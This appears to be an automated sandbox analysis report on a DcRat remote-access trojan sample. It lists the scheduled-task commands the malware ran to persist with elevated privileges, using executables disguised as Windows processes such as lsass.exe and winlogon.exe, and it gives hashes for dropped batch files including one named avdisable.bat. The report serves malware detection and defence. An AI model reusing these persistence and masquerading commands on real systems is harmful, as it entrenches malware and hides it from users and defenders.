                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4856
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3324
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3872
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5100
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4272
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3236
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3316
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4320
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3124
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2028
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1284
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2664
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2084
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4492
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4620
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3596
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4672
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4184
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3708
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5012
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4396
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3232
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3116
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1680
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2788
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4268
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2060
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4756
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2076
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2392
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:316
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2780
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3244
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4040
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:704
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4340
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3764
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:1836
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5004
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3484
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4724
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3468
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5020
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4116
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2992

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        b20a84a0d572356548413fcf7e1c8ff1

                                                                                                                                        SHA1

                                                                                                                                        b02347fd036ce5c9df0cac4f8898e25c1bcef9b6

                                                                                                                                        SHA256

                                                                                                                                        9d2be47e92371e5abe5f070cce2cfeaed2018f85ff7b8f22849e9088e74df971

                                                                                                                                        SHA512

                                                                                                                                        d03b545a0bfcc79c1bd11f46bbec09e6cfa1159bd9b70fd297c3c847f7a397200d376098a486f23bab37fd487edff683fc0f798844d363ba41d2ae4cc7d02cef

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        a057be178907b374ad8793ca7aa478be

                                                                                                                                        SHA1

                                                                                                                                        029c1e9f31008d34d59c6bbbc3c79ba5178e7cf7

                                                                                                                                        SHA256

                                                                                                                                        581702742101391ac48b2b26a2eaa6199990934b84abfe070fba5bfebed04bba

                                                                                                                                        SHA512

                                                                                                                                        fa72c3ccb46814e03e34796361a115a4d09b5e0278a6e16667a3d8bc392f667da69e0aee4332d1cfd89d525a3abfd089cb6987a0eb36d041ef12d11d3650a4a6

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        0c68b8bf8541d2ba1156d3e2906f0dc1

                                                                                                                                        SHA1

                                                                                                                                        bca847270732e07d016980a9946f23d300c1813d

                                                                                                                                        SHA256

                                                                                                                                        1370e0d250e1aede938f94c4fad64aab114b30b025d3a3ef71dd37c264c63bc1

                                                                                                                                        SHA512

                                                                                                                                        d18b9fa4428e82d6f6ed55edd6d70acc61095fe20d124b4940941c8a42cf9b3c1c85b73cd1b74e37d72086e76b678287d206e592e4e0417cf969f3c180518288

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        3fac2909521a97a0721dd45b153fbf5d

                                                                                                                                        SHA1

                                                                                                                                        81e4aa7d209f6595dfd964d26991e5359b498d2b

                                                                                                                                        SHA256

                                                                                                                                        95e21f2b0339463e2b8c134819a370e1c0495142c8258b3c5c931f7bbecacd12

                                                                                                                                        SHA512

                                                                                                                                        6eebd64fec761ef5c51815b9918ea3ef139ae208af8bdb5eab30cb5dcbe064e4a9c9e8c4bf307f75f4b28861fb6afb3a35fdc9b66a224753938b0bdce611fb3f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        42afdea7c75bc9074a22ff1be2787959

                                                                                                                                        SHA1

                                                                                                                                        24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                                                                                                        SHA256

                                                                                                                                        3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                                                                                                        SHA512

                                                                                                                                        d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        d7ca49989aa6b1e8d5de9f553a9370c0

                                                                                                                                        SHA1

                                                                                                                                        73f3c05266d89e992057923197cf0f53251330da

                                                                                                                                        SHA256

                                                                                                                                        6566426a59b10f212938b9f268db906c0a0235f5acfb92c3f9ca25dfa3634e2f

                                                                                                                                        SHA512

                                                                                                                                        cc75cd31c7ebde22ece42c4dc15e8a10ce90bbdbe3946df1db83087de3a13a725bc952db582f71219423409f94fa16f7d62234ddf36946cb2d1c9923da07a5b0

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        951d9e2b6bb6c2226bde8b7aa2d81f1e

                                                                                                                                        SHA1

                                                                                                                                        4430d5e127113b81c8ac11b49a1cab50307f20c1

                                                                                                                                        SHA256

                                                                                                                                        402f98979d38d51bc76d7d74e375adb1d71ee5b262c1f047147911367f0914eb

                                                                                                                                        SHA512

                                                                                                                                        e14c67adad4656043896f6a7a2d1d52112f9b1641dc2042de67497dfa76e53e68d3767995826ab942e8eeebdef47c51652958da15b3365cd13b0e8ae5799a3d5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        e0d42a5447e75ec041cb9f5bffdaf4ec

                                                                                                                                        SHA1

                                                                                                                                        9a02ddf22749385d353da630aae1f6a2863afdfd

                                                                                                                                        SHA256

                                                                                                                                        6fd5cc8a902f1a481ce482a2ceedfb33cfb85ba3e8948917a39d4be3a7e8d4de

                                                                                                                                        SHA512

                                                                                                                                        fe1312dd3f741d406ffa5af0fff7177d3c6f102abde6c6d44c8e9b6391eb6f7cdf427c807b868629f174c57ea0c3435aa6f165d465dd9723ba5d5bf05fcc3ce4

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

                                                                                                                                        Filesize

                                                                                                                                        2.4MB

                                                                                                                                        MD5

                                                                                                                                        4eab8d478ffd36a7d96ca9a8512cc447

                                                                                                                                        SHA1

                                                                                                                                        cddb1b2d3656d62cdcc67125ec29f2bf83c5f346

                                                                                                                                        SHA256

                                                                                                                                        a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a

                                                                                                                                        SHA512

                                                                                                                                        c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        6e6602b0cb6bb85722b6a40cbb06d055

                                                                                                                                        SHA1

                                                                                                                                        6c385ce1d0d75957c8b5ddc6e39804fe21fc4f0f

                                                                                                                                        SHA256

                                                                                                                                        15ee8c5a463d7a2e122025568088b508510289196ea9f850aa7191401b5d9ba9

                                                                                                                                        SHA512

                                                                                                                                        292ee848dae3ff701e2f00170b63027b9a7e7a9590f1999bb730c070a570aa528909d4dd14ff8fa6d4455743c8be7c97feb05b55918fb9ddf053fbed1b4396d5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        3f0b8273509b654656b5e309a566eb73

                                                                                                                                        SHA1

                                                                                                                                        f7e750d2d5e2e2b862cae8c42293291a894cd3a6

                                                                                                                                        SHA256

                                                                                                                                        13ae5d3c2bff65076c6c478d351e488e92660f28678396b3457bed06123e3690

                                                                                                                                        SHA512

                                                                                                                                        829e48848e980fc0373e2de28252ad2cfcc15646faae359a51aae1920ca5b6e82b59378548a31fef8e1ae58acc1641b8245ab46708a413ad18b3962fc1c08967

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        be03b65ee5a586260742d5b400f490e2

                                                                                                                                        SHA1

                                                                                                                                        57e1ab3579f64161d8508accc87e5bd9b976153d

                                                                                                                                        SHA256

                                                                                                                                        d4e1701bf6176359dd42a525175d2c7b8e4006c0884ba27e84deed78e563e438

                                                                                                                                        SHA512

                                                                                                                                        f1daebf1f0c00d6ae49a22a8ec5ae01a29cf753a293072a79dff47f222f3e30548ff03262d7bdc23cf3852dfc41585a3c6f7aeb315d2cb5e3d16484135f9c5c8

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        272139a27f07bb75d4c922cbc0e3ff22

                                                                                                                                        SHA1

                                                                                                                                        019c69a8fa94f6c579c6060bb61b4c7cd2a72b3e

                                                                                                                                        SHA256

                                                                                                                                        4f5c77dd5a2106057357e6537fec7659d32fdd1105d4ffef38b00179ce581f21

                                                                                                                                        SHA512

                                                                                                                                        26b968f6e2d7fae6f987d20c5308914dc287a240345d88dbd6df77f555f82e21cf7ab392d3d47a290a2a733e5f0032dff64f9c1c3e01b2e630120ef2935b84b8

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        1cfcd21b46dc76c86039c4f9e05b01ff

                                                                                                                                        SHA1

                                                                                                                                        d81134539a21060e9a45b8f9bc5fe19294a4f273

                                                                                                                                        SHA256

                                                                                                                                        1acd3d9ac601d0953a834ac5ef3e51f50e02c0e1506e8a88cee39f1acc9d735d

                                                                                                                                        SHA512

                                                                                                                                        0bf710dc09f82e2458340ee14e60fd6fa19e04cb02e3b7d77b48159b0fd284e2bae2d90b07de3608730a62c6dfbe850e9eb75eb111d8555f99ea9313a861d3e3

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        06b539d6a9da2069b07f06d56b78fad8

                                                                                                                                        SHA1

                                                                                                                                        ecfae9d7a5be859895d36c93e309d602f14cacab

                                                                                                                                        SHA256

                                                                                                                                        6e1f316f5653129958a8a7165c8011dfa07b88dd0de1296e4cf2d55b213990ba

                                                                                                                                        SHA512

                                                                                                                                        05706f934d4c3a09fe249b7dcd803fd72a315c3cbb86080cb914777d917364b4ebcc3cc0cbc92c57b275690e784259b55dd4d3ba1dbd805a23855a76626fda84

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        4c35b71d2d89c8e8eb773854085c56ea

                                                                                                                                        SHA1

                                                                                                                                        ede16731e61348432c85ef13df4beb2be8096d9b

                                                                                                                                        SHA256

                                                                                                                                        3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                                                                                                        SHA512

                                                                                                                                        a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat

